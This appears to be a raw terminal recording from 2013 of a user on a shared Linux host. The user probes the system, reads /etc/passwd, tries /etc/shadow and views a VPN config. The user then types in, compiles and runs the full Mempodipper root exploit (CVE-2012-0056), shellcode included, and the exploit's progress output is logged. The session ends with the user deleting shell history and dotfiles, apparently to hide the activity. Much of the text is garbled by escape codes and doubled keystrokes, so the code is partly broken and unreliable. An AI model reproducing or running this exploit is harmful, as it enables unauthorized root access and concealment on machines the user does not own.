Script started on Wed 09 Jan 2013 09:44:12 PM EST
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~). This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q) Quit and do nothing. The function will be run again next time.

(0) Exit, creating the file ~/.zshrc containing just a comment.
    That will prevent this function being run again.

(1) Continue to the main menu.

(2) Populate your ~/.zshrc with the configuration recommended
    by the system administrator and exit (you will need to edit
    the file by hand, if so desired).

--- Type one of the keys in parentheses ---

Aborting.
The function will be run again next time. To prevent this, execute:
  touch ~/.zshrc
magnesium% ps aux | grep ssh
zsh: permission denied: ps
magnesium% ls > hello
magnesium% ls
hello
magnesium% rm hello
magnesium% ls
magnesium% ls
magnesium% ls -la
total 68
drwxr-xr-x  2 mmaton mmaton  4096 Jan  9 21:44 .
drwxr-xr-x 36 root   root    4096 Jan  9 21:20 ..
-rw-------  1 mmaton mmaton    16 Jan  9 21:42 .bash_history
-rw-r--r--  1 mmaton mmaton   220 Jan  9 21:20 .bash_logout
-rw-r--r--  1 mmaton mmaton  3544 Jan  9 21:43 .bashrc
-rw-r--r--  1 mmaton mmaton   675 Jan  9 21:20 .profile
-rw-------  1 mmaton mmaton 33960 Jan  9 21:44 .zcompdump
-rw-------  1 mmaton mmaton     5 Jan  9 21:44 .zsh_history
-rw-------  1 mmaton mmaton  1295 Jan  9 21:44 .zshrc
magnesium% cat .bash_history
id
exit
id
exit
magnesium% cat .bash_history
id
exit
id
exit
magnesium% cat .bash_history
id
exit
id
exit
magnesium% cat .bash_history
id
exit
id
exit
magnesium% cat .bash_history
id
exit
id
exit
magnesium% uname 0a
uname: extra operand `0a'
Try `uname --help' for more information.
magnesium% uname -a
Linux magnesium 3.2.0-4-686-pae #1 SMP Debian 3.2.32-1 i686 GNU/Linux
magnesium% cat /etc/passwd
magnesium% python -v
Python 2.7.3 (default, Sep 10 2012, 00:09:03)
[GCC 4.7.1] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
>>>
KeyboardInterrupt
>>>
KeyboardInterrupt
>>>
KeyboardInterrupt
>>> exit()
magnesium% cat /etc/passwd
magnesium% cat /etc/shadow
cat: /etc/shadow: Permission denied
magnesium% ps
zsh: permission denied: ps
magnesium% locate
locate: no pattern to search for specified
magnesium% cd /usr/
bin/ games/ include/ lib/ local/ sbin/ share/ src/
magnesium% uname -a
Linux magnesium 3.2.0-4-686-pae #1 SMP Debian 3.2.32-1 i686 GNU/Linux
magnesium% netstat -an
magnesium% gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i486-linux-gnu/4.7/lto-wrapper
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.7.2-4' --with-bugurl=file:///usr/share/doc/gcc-4.7/README.Bugs --enable-languages=c,c++,go,fortran,objc,obj-c++ --prefix=/usr --program-suffix=-4.7 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.7 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --enable-targets=all --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.7.2 (Debian 4.7.2-4)
magnesium% ls
magnesium% cd .
magnesium% cd /
magnesium% ls
bin   ca.crt  etc   initrd.img      lib         media  openvpn.conf  proc  run   selinux  sys  usr  vmlinuz
boot  dev     home  initrd.img.old  lost+found  mnt    opt           root  sbin  srv      tmp  var  vmlinuz.old
magnesium% cat ca.crt
magnesium% cat openvpn.conf
client
cipher AES-256-CBC
remote 199.229.249.189
port 53
ca ca.crt
auth-user-pass
dev tun
proto udp
nobind
auth-nocache
script-security 2
persist-key
persist-tun
comp-lzo
magnesium% lsof -P -i -n
magnesium% lsof-i
zsh: command not found: lsof-i
magnesium% lsof-i -i
magnesium% man lsof
LSOF(8)                                                                LSOF(8)

NAME
       lsof - list open files

SYNOPSIS
       lsof [ -?abChKlnNOPRtUvVX ] [ -A A ] [ -c c ] [ +c c ] [ +|-d d ]
       [ +|-D D ] [ +|-e s ] [ +|-f [cfgGn] ] [ -F [f] ] [ -g [s] ]
       [ -i [i] ] [ -k k ] [ +|-L [l] ] [ +|-m m ] [ +|-M ] [ -o [o] ]
       [ -p s ] [ +|-r [t[m]] ] [ -s [p:s] ] [ -S [t] ] [ -T [t] ]
       [ -u s ] [ +|-w ] [ -x [fl] ] [ -z [z] ] [ -Z [Z] ] [ -- ] [names]

DESCRIPTION
       Lsof revision 4.86 lists on its standard output file information
       about files opened by processes for the following UNIX dialects:

            Apple Darwin 9 and Mac OS X 10.[567]
            FreeBSD 4.9 and 6.4 for x86-based systems
            FreeBSD 8.2, 9.0 and 10.0 for AMD64-based systems
            Linux 2.1.72 and above for x86-based systems
            Solaris 9, 10 and 11

       (See the DISTRIBUTION section of this manual page for information
       on how to obtain the latest lsof revision.)

       An open file may be a regular file, a directory, a block special
       file, a character special file, an executing text reference, a
       library, a stream or a network file (Internet socket, NFS file or
       UNIX domain socket.) A specific file or all the files in a file
       system may be selected by path.

       Instead of a formatted display, lsof will produce output that can
       be parsed by other programs. See the -F, option description, and
       the OUTPUT FOR OTHER PROGRAMS section for more information.

       In addition to producing a single output list, lsof will run in
       repeat mode. In repeat mode it will produce output, delay, then
       repeat the output operation until stopped with an interrupt or
       quit signal. See the +|-r [t[m]] option description for more
       information.

OPTIONS
       In the absence of any options, lsof lists all open files belonging
       to all active processes.

       If any list request option is specified, other list requests must
       be specifically requested - e.g., if -U is specified for the
       listing of UNIX socket files, NFS files won't be listed unless -N
       is also specified; or if a user list is specified with the -u
       option, UNIX domain socket files, belonging to users not in the
       list, won't be listed unless the -U option is also specified.

       Normally list options that are specifically stated are ORed -
       i.e., specifying the -i option without an address and the -ufoo
       option produces a listing of all network files OR files belonging
       to processes owned by user ``foo''. The exceptions are:

 Manual page lsof(8) line 1 (press h for help or q to quit)
magnesium% cd root/
cd: permission denied: root
magnesium% ls
bin   ca.crt  etc   initrd.img      lib         media  openvpn.conf  proc  run   selinux  sys  usr  vmlinuz
boot  dev     home  initrd.img.old  lost+found  mnt    opt           root  sbin  srv      tmp  var  vmlinuz.old
magnesium% cd tmp/
magnesium% ls
hsperfdata_valcorb  tmux-1000
magnesium% cat hsperfdata_valcorb/
cat: hsperfdata_valcorb: Permission denied
magnesium% cd hsperfdata_valcorb/
cd: permission denied: hsperfdata_valcorb
magnesium% ls
hsperfdata_valcorb  tmux-1000
magnesium% cd ..
magnesium% ls
bin   ca.crt  etc   initrd.img      lib         media  openvpn.conf  proc  run   selinux  sys  usr  vmlinuz
boot  dev     home  initrd.img.old  lost+found  mnt    opt           root  sbin  srv      tmp  var  vmlinuz.old
magnesium% cd run/
magnesium% ls
acpid.pid     console                 crond.reboot  initramfs       motd.dynamic  rsyslogd.pid     sshd      utmp
acpid.socket  ConsoleKit              dbus          lock            mount         screen           sshd.pid
atd.pid       console-kit-daemon.pid  exim4         minissdpd.pid   network       sendsigs.omit.d  tor
bitlbee.pid   crond.pid               initctl       minissdpd.sock  prosody       shm              udev
magnesium% cd ..
% magnesium% uuname -a Linux magnesium 3.2.0-4-686-pae #1 SMP Debian 3.2.32-1 i686 GNU/Linux % magnesium% pphp -v PHP 5.4.4-10 (cli) (built: Nov 24 2012 12:48:13) Copyright (c) 1997-2012 The PHP Group Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies % magnesium% vvim p  v  ccd ~ % magnesium% mmkdir .bash_q % magnesium% ccd .bash_q/  % magnesium% lls % magnesium% vvim pipe.c zsh: command not found: vim % magnesium% vvi pipe.c [?1049h[?1h=[?12;25h[?12l[?25h[?25l"pipe.c" [New File]~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ [?12l[?25h[?25li[?12l[?25h[?25l[?12l[?25h[?25l * * CVE-2012-0056 */#define _LARGEFILE64_SOURCE#define _GNU_SOURCE#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include char *prog_name;int send_fd(int sock, int fd){ char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; int n; char cms[CMSG_SPACE(sizeof(int))]; buf[0] = 0; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = CMSG_LEN(sizeof(int)); cmsg = CMSG[?12l[?25h[?25l}int recv_fd(int sock) { int n; int fd; char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; char cms[CMSG_SPACE(sizeof(int))];  iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_name = 0; msg.msg_namelen = 0; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = sizeof cms; if ((n = recvmsg(sock, &msg, 0)) < 0)  return -1; if (n == 0) return -1; cmsg = CMSG_FIRSTHDR(&msg); memmove(&fd, CMSG_DATA(cmsg), sizeof(int)); close(sock); return fd;}unsigned long ptrace_address() { int fd[2]; printf("[+] Creating ptrace pipe.\n"); pipe(fd); fcntl(fd[0], F_SETFL, O_NONBLOCK); printf("[+] Forking ptrace child.\n"); int child = fork(); if (child) [?12l[?25h[?25l { close(fd[1]); char buf; printf("[+] Waiting 
for ptraced child to give output on syscalls.\n"); for (;;) { wait(NULL); if (read(fd[0], &buf, 1) > 0) break; ptrace(PTRACE_SYSCALL, child, NULL, NULL); } printf("[+] Error message written. Single stepping to find address.\n"); struct user_regs_struct regs; for (;;) { ptrace(PTRACE_SINGLESTEP, child, NULL, NULL); wait(NULL); ptrace(PTRACE_GETREGS, child, NULL, ®s); #if defined(__i386__) #define instruction_pointer regs.eip #define upper_bound 0xb0000000 #elif defined(__x86_64__) #define instruction_pointer regs.rip #define upper_bound 0x700000000000 #else #error "That platform is not supported." #endif if (instruction_pointer < upper_bound) { unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) return instruction_pointer; } } } else { printf("[+] Ptrace_traceme'ing process.\n"); if (ptrace(PTRACE_TRACEME,[?12l[?25h[?25l 0, NULL, NULL) < 0) { perror("[-] ptrace"); return 0; } close(fd[0]); dup2(fd[1], 2); execl("/bin/su", "su", "not-a-valid-user", NULL); } return 0; } unsigned long objdump_address() { FILE *command = popen("objdump -d /bin/su|grep ''|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'",, "r"); if (!command) { perror("[-] popen"); return 0; } char result[32]; fgets(result, 32, command); pclose(command); return strtoul(result, NULL, 16); } unsigned long find_address() { printf("[+] Ptracing su to find next instruction without reading binary.\n"); unsigned long address = ptrace_address(); if (!address) { printf("[-] Ptrace failed.\n"); printf("[+] Reading su binary with objdump to find exit@plt.\n"); address = objdump_address(); if (address == ULONG_MAX || !address) { printf("[-] Could not resolve /bin/su. 
Specify the exit@plt function address manually.\n"); printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name); e printf("[+] Resolved call address to 0x%lx.\n", address); return address; } int su_padding() { printf("[+] Calculating su padding.\n"); FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r"); if (!command) { perror("[-] popen"); exit(1); } char result[256]; fgets(result, 256, command); pclose(command); strstr(result, "this-user-does-not-exist") - result; int child(int sock) char parent_mem[256]; sprintf(parent_mem, "/proc/%d/mem", getppid()); printf("[+] Opening parent mem %s in child.\n", parent_mem); int fd = open(parent_mem, O_RDWR); if (fd < 0) { perror("[-] open"); return 1; } printf("[+] Sending fd %d to parent.\n", fd); send_fd(sock, fd); return 0; } int parent(unsigned long address) { int sockets[2]; printf("[+] Opening socketpair.\n"); if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) { perror("[-] socketpair"); return 1; } if (fork()) { printf("[+] Waiting for transferred fd in parent.\n"); int fd = recv_fd(sockets[1]); printf("[+] Received fd at %d.\n", fd); if (fd < 0) { perror("[-] recv_fd"); return 1; } printf("[+] Assigning fd %d to stderr.\n", fd); dup2(2, 15); dup2(fd, 2); unsigned long offset = address - su_padding(); printf("[+] Seeking to offset 0x%lx.\n", offset); lseek64(fd, offset, SEEK_SET); #if defined(__i386__) // See shellcode-32.s in this package for the source. char shellcode[] = "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3" "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89" "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd" "\x80"; #elif defined(__x86_64__) // See shellcode-64.s in this package for the source.
char shellcode[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48" "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f" "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7" "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50" "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; #else #error "That platform is not supported." #endif printf("[+] Executing su with shellcode.\n"); execl("/bin/su", "su", shellcode, NULL); } else { char sock[32]; sprintf(sock, "%d", sockets[0]); printf("[+] Executing child from child fork.\n"); execl("/proc/self/exe", prog_name, "-c", sock, NULL); } return 0; } int main(int argc, char **argv) { prog_name = argv[0]; if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') return child(atoi(argv[2])); printf("===============================\n"); printf("= Mempodipper =\n"); printf("= by zx2c4 =\n"); printf("= Jan 21, 2012 =\n"); printf("===============================\n\n"); if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o') return parent(strtoul(argv[2], NULL, 16)); else return parent(find_address()); } :wq "pipe.c" [New File] 287 lines, 7093 characters written % magnesium% ggcc pipe.c  -O piper gcc: error: piper: No such file or directory % magnesium% gcc pipe.c -O piper        % magnesium% lls a.out pipe.c % magnesium% ../.  ccjm c chmod 777 a.out   % magnesium% ../a.out   =============================== = Mempodipper = = by zx2c4 = = Jan 21, 2012 = =============================== [+] Ptracing su to find next instruction without reading binary. [+] Creating ptrace pipe. [+] Forking ptrace child. [+] Waiting for ptraced child to give output on syscalls. [+] Ptrace_traceme'ing process. [+] Error message written. Single stepping to find address. [+] Resolved call address to 0x8049a50. [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork.
[+] Opening parent mem /proc/21209/mem in child. [+] Sending fd 6 to parent. [+] Received fd at 6. [+] Assigning fd 6 to stderr. [+] Calculating su padding. [+] Seeking to offset 0x8049a36. [+] Executing su with shellcode. ^C % magnesium% lls a.out pipe.c % magnesium% ls./a.out I'm gay % magnesium% LLOL zsh: command not found: LOL % magnesium% ccat a.out   #!/bin/bash echo "I'm gay" % magnesium% llsl  ccd .. % magnesium% lls % magnesium% lls -la total 72 drwxr-xr-x 3 mmaton mmaton 4096 Jan 9 21:58 . drwxr-xr-x 36 root root 4096 Jan 9 21:20 .. -rw------- 1 mmaton mmaton 16 Jan 9 21:42 .bash_history -rw-r--r-- 1 mmaton mmaton 220 Jan 9 21:20 .bash_logout drwx------ 2 mmaton mmaton 4096 Jan 9 21:59 .bash_q -rw-r--r-- 1 mmaton mmaton 3544 Jan 9 21:43 .bashrc -rw-r--r-- 1 mmaton mmaton 675 Jan 9 21:20 .profile -rw------- 1 mmaton mmaton 33960 Jan 9 21:44 .zcompdump -rw------- 1 mmaton mmaton 5 Jan 9 21:44 .zsh_history -rw------- 1 mmaton mmaton 1295 Jan 9 21:44 .zshrc % magnesium% rrm -rf .bash .bash_history .bash_logout .bash_q/ .bashrc rm -rf .bash) _q/  % magnesium% lls % magnesium% llogout logout: not login shell %